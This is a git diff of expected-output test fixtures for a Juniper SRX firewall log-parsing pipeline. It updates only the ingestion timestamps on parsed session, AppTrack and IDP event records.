@@ -80,7 +80,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.706916400Z", + "ingested": "2021-12-14T14:47:11.679892458Z", "original": "\u003c14\u003e1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"10.0.0.1\" source-port=\"594\" destination-address=\"10.128.0.1\" destination-port=\"10400\" connection-tag=\"0\" service-name=\"icmp\" nat-source-address=\"10.0.0.1\" nat-source-port=\"594\" nat-destination-address=\"10.128.0.1\" nat-destination-port=\"10400\" nat-connection-tag=\"0\" src-nat-rule-type=\"N/A\" src-nat-rule-name=\"N/A\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"1\" policy-name=\"vpn_trust_permit-all\" source-zone-name=\"vpn\" destination-zone-name=\"trust\" session-id-32=\"6093\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"st0.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", 
@@ -163,7 +163,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.706995100Z", + "ingested": "2021-12-14T14:47:11.679895607Z", "original": "\u003c14\u003e1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"10.128.0.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", @@ -265,7 +265,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.706999500Z", + "ingested": "2021-12-14T14:47:11.679896199Z", "original": "\u003c14\u003e1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address=\"67.43.156.15\" source-port=\"56639\" destination-address=\"67.43.156.15\" destination-port=\"2003\" service-name=\"None\" protocol-id=\"6\" icmp-type=\"0\" policy-name=\"log-all-else\" source-zone-name=\"campus\" destination-zone-name=\"mngmt\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth6.0\" encrypted=\"No \"]", "kind": "event", "action": "flow_deny", 
@@ -392,7 +392,7 @@ "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707006900Z", + "ingested": "2021-12-14T14:47:11.679896588Z", "original": "\u003c14\u003e1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"unset\" source-address=\"67.43.156.15\" source-port=\"63456\" destination-address=\"67.43.156.15\" destination-port=\"902\" service-name=\"None\" nat-source-address=\"67.43.156.15\" nat-source-port=\"63456\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"902\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"17\" policy-name=\"mngmt-to-vcenter\" source-zone-name=\"mngmt\" destination-zone-name=\"intra\" session-id-32=\"15353\" packets-from-client=\"1\" bytes-from-client=\"94\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"60\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth3.5\" encrypted=\"No \"]", "kind": "event", "start": "2014-05-01T08:28:10.933Z", @@ -510,7 +510,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.707014500Z", + "ingested": "2021-12-14T14:47:11.679898074Z", "original": "\u003c14\u003e1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"24065\" destination-address=\"67.43.156.14\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"24065\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", "kind": "event", "action": "flow_started", 
@@ -616,7 +616,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.707020500Z", + "ingested": "2021-12-14T14:47:11.679898522Z", "original": "\u003c14\u003e1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"192.168.2.1\" source-port=\"1\" destination-address=\"192.168.100.12\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.168.2.1\" nat-source-port=\"1\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packet-incoming-interface=\"ge-0/0/1.0\"]", "kind": "event", "action": "flow_started", @@ -734,7 +734,7 @@ "event": { "duration": 0, "severity": 14, - "ingested": "2021-12-10T10:13:51.707025300Z", + "ingested": "2021-12-14T14:47:11.679898995Z", "original": "\u003c14\u003e1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"response received\" source-address=\"192.168.2.1\" source-port=\"1\" destination-address=\"192.168.100.12\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.168.2.1\" nat-source-port=\"1\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packets-from-client=\"1\" bytes-from-client=\"84\" packets-from-server=\"1\" bytes-from-server=\"84\" elapsed-time=\"0\" packet-incoming-interface=\"ge-0/0/1.0\"]", "kind": "event", "start": "2010-09-30T06:55:07.188Z", 
@@ -862,7 +862,7 @@ "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707031700Z", + "ingested": "2021-12-14T14:47:11.679899393Z", "original": "\u003c14\u003e1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP FIN\" source-address=\"10.3.255.203\" source-port=\"47776\" destination-address=\"67.43.156.15\" destination-port=\"80\" connection-tag=\"0\" service-name=\"junos-http\" nat-source-address=\"10.3.136.49\" nat-source-port=\"19162\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"nat1\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit_all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"5\" packets-from-client=\"6\" bytes-from-client=\"337\" packets-from-server=\"4\" bytes-from-server=\"535\" elapsed-time=\"1\" application=\"HTTP\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/0.0\" encrypted=\"No\" application-category=\"Web\" application-sub-category=\"N/A\" application-risk=\"4\" application-characteristics=\"Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;\"]", "risk_score": 4.0, "kind": "event", 
@@ -970,7 +970,7 @@ "event": { "duration": 16000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707037500Z", + "ingested": "2021-12-14T14:47:11.679899790Z", "original": "\u003c14\u003e1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP RST\" source-address=\"192.168.2.164\" source-port=\"53232\" destination-address=\"172.16.1.19\" destination-port=\"445\" service-name=\"junos-smb\" nat-source-address=\"192.168.2.164\" nat-source-port=\"53232\" nat-destination-address=\"172.16.1.19\" nat-destination-port=\"445\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"35\" source-zone-name=\"Trust\" destination-zone-name=\"Trust\" session-id-32=\"206\" packets-from-client=\"13\" bytes-from-client=\"4274\" packets-from-server=\"9\" bytes-from-server=\"1575\" elapsed-time=\"16\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/2.0\"]", "kind": "event", "start": "2019-04-13T14:33:06.576Z", 
@@ -1102,7 +1102,7 @@ "event": { "duration": 8000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707045Z", + "ingested": "2021-12-14T14:47:11.679900173Z", "original": "\u003c14\u003e1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"67.43.156.14\" source-port=\"52890\" destination-address=\"67.43.156.14\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"11152\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"NAT_S\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"NAT\" source-zone-name=\"Gi_nat\" destination-zone-name=\"Internet\" session-id-32=\"220368889\" packets-from-client=\"1\" bytes-from-client=\"72\" packets-from-server=\"1\" bytes-from-server=\"136\" elapsed-time=\"8\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.108\" encrypted=\"UNKNOWN\"]", "kind": "event", "start": "2018-10-07T01:32:20.898Z", 
@@ -1224,7 +1224,7 @@ "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707054600Z", + "ingested": "2021-12-14T14:47:11.679900572Z", "original": "\u003c14\u003e1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"192.168.255.2\" source-port=\"62047\" destination-address=\"67.43.156.15\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"192.168.0.47\" nat-source-port=\"20215\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"rule001\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"trust-to-untrust-001\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"9621\" packets-from-client=\"1\" bytes-from-client=\"67\" packets-from-server=\"1\" bytes-from-server=\"116\" elapsed-time=\"3\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"fe-0/0/1.0\" encrypted=\"UNKNOWN\"]", "kind": "event", "start": "2018-06-30T02:17:22.753Z", 
@@ -1336,7 +1336,7 @@ "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707064800Z", + "ingested": "2021-12-14T14:47:11.679901243Z", "original": "\u003c14\u003e1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"application failure or action\" source-address=\"10.164.110.223\" source-port=\"9057\" destination-address=\"10.104.12.161\" destination-port=\"21\" service-name=\"junos-ftp\" nat-source-address=\"10.9.1.150\" nat-source-port=\"58020\" nat-destination-address=\"10.12.70.1\" nat-destination-port=\"21\" src-nat-rule-name=\"SNAT-Policy5\" dst-nat-rule-name=\"NAT-Policy10\" protocol-id=\"6\" policy-name=\"FW-FTP\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"24311\" packets-from-client=\"0\" bytes-from-client=\"0\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"1\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.0\" encrypted=\"No \"]", "kind": "event", "start": "2015-09-25T14:19:53.846Z", @@ -1453,7 +1453,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.707069700Z", + "ingested": "2021-12-14T14:47:11.679901636Z", "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@67.43.156.15 source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "action": "flow_started", 
@@ -1579,7 +1579,7 @@ "event": { "duration": 0, "severity": 14, - "ingested": "2021-12-10T10:13:51.707074200Z", + "ingested": "2021-12-14T14:47:11.679902026Z", "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"1\" bytes-from-client=\"48\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"0\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "start": "2013-01-19T15:18:17.040Z", 
@@ -1709,7 +1709,7 @@ "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707078Z", + "ingested": "2021-12-14T14:47:11.679902414Z", "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"application failure or action\" source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"FTP\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"3\" bytes-from-client=\"144\" packets-from-server=\"2\" bytes-from-server=\"104\" elapsed-time=\"1\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "start": "2013-01-19T15:18:17.040Z", 
@@ -1850,7 +1850,7 @@ "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707084500Z", + "ingested": "2021-12-14T14:47:11.679902819Z", "original": "\u003c14\u003e1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"33040\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.14\" nat-source-port=\"33040\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" packets-from-client=\"371\" bytes-from-client=\"19592\" packets-from-server=\"584\" bytes-from-server=\"686432\" elapsed-time=\"60\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2013-01-19T15:18:18.040Z", 
@@ -1983,7 +1983,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.707095700Z", + "ingested": "2021-12-14T14:47:11.679903398Z", "original": "\u003c14\u003e1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"33040\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.14\" nat-source-port=\"33040\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "action": "flow_started", 
@@ -2121,7 +2121,7 @@ "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707105400Z", + "ingested": "2021-12-14T14:47:11.679903813Z", "original": "\u003c14\u003e1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP CLIENT RST\" source-address=\"67.43.156.14\" source-port=\"48873\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"48873\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2013-01-19T15:18:20.040Z", 
@@ -2239,7 +2239,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.707114900Z", + "ingested": "2021-12-14T14:47:11.679904206Z", "original": "\u003c14\u003e1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"24065\" destination-address=\"67.43.156.14\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"24065\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", "kind": "event", "action": "flow_started", @@ -2321,7 +2321,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.707124300Z", + "ingested": "2021-12-14T14:47:11.679904617Z", "original": "\u003c14\u003e1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@67.43.156.15 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"10.128.0.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", 
@@ -2459,7 +2459,7 @@ "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707133700Z", + "ingested": "2021-12-14T14:47:11.679905009Z", "original": "\u003c14\u003e1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@67.43.156.15 reason=\"TCP CLIENT RST\" source-address=\"67.43.156.14\" source-port=\"48873\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"48873\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2020-01-19T15:18:20.040Z", 
@@ -2580,7 +2580,7 @@ "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707143100Z", + "ingested": "2021-12-14T14:47:11.679905465Z", "original": "\u003c14\u003e1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"10.1.1.100\" source-port=\"58943\" destination-address=\"67.43.156.14\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"6018\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"80\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"16118\" packets-from-client=\"42\" bytes-from-client=\"2322\" packets-from-server=\"34\" bytes-from-server=\"2132\" elapsed-time=\"60\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" destination-interface-name=\"ge-0/0/0.0\" category=\"N/A\" sub-category=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "kind": "event", "start": "2020-07-14T14:17:11.928Z", 
@@ -2710,7 +2710,7 @@ "event": { "duration": 23755000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707152400Z", + "ingested": "2021-12-14T14:47:11.679905852Z", "original": "\u003c14\u003e1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"10.1.1.100\" source-port=\"64720\" destination-address=\"67.43.156.15\" destination-port=\"8883\" connection-tag=\"0\" service-name=\"None\" nat-source-address=\"172.19.34.100\" nat-source-port=\"24519\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"8883\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"3851\" packets-from-client=\"161\" bytes-from-client=\"9530\" packets-from-server=\"96\" bytes-from-server=\"9670\" elapsed-time=\"23755\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" secure-web-proxy-session-type=\"NA\" peer-session-id=\"0\" peer-source-address=\"0.0.0.0\" peer-source-port=\"0\" peer-destination-address=\"0.0.0.0\" peer-destination-port=\"0\" hostname=\"NA NA\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "risk_score": 1.0, "kind": "event", 
@@ -2823,7 +2823,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.707162Z", + "ingested": "2021-12-14T14:47:11.679906338Z", "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"10.1.1.100\" source-port=\"49583\" destination-address=\"67.43.156.15\" destination-port=\"53\" connection-tag=\"0\" service-name=\"junos-dns-udp\" nat-source-address=\"172.19.34.100\" nat-source-port=\"30838\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15399\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "risk_score": 1.0, "kind": "event", 
@@ -2947,7 +2947,7 @@ "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707171200Z", + "ingested": "2021-12-14T14:47:11.679906745Z", "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"Closed by junos-alg\" source-address=\"10.1.1.100\" source-port=\"63381\" destination-address=\"67.43.156.15\" destination-port=\"53\" service-name=\"junos-dns-udp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"26764\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15361\" packets-from-client=\"1\" bytes-from-client=\"66\" packets-from-server=\"1\" bytes-from-server=\"82\" elapsed-time=\"3\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" profile-name=\"N/A\" rule-name=\"N/A\" routing-instance=\"default\" destination-interface-name=\"ge-0/0/0.0\" uplink-incoming-interface-name=\"N/A\" uplink-tx-bytes=\"0\" uplink-rx-bytes=\"0\" category=\"N/A\" sub-category=\"N/A\" apbr-policy-name=\"N/A\" multipath-rule-name=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "kind": "event", "start": "2020-07-13T16:12:05.530Z", diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json index 2d9eb57de25..85624c466b3 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json 
@@ -111,7 +111,7 @@ "event": { "duration": 0, "severity": 165, - "ingested": "2021-12-09T13:40:03.197201400Z", + "ingested": "2021-12-14T14:47:24.701235269Z", "original": "\u003c165\u003e1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"67.43.156.14\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"HTTP:MISC:GENERIC-DIR-TRAVERSAL\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" 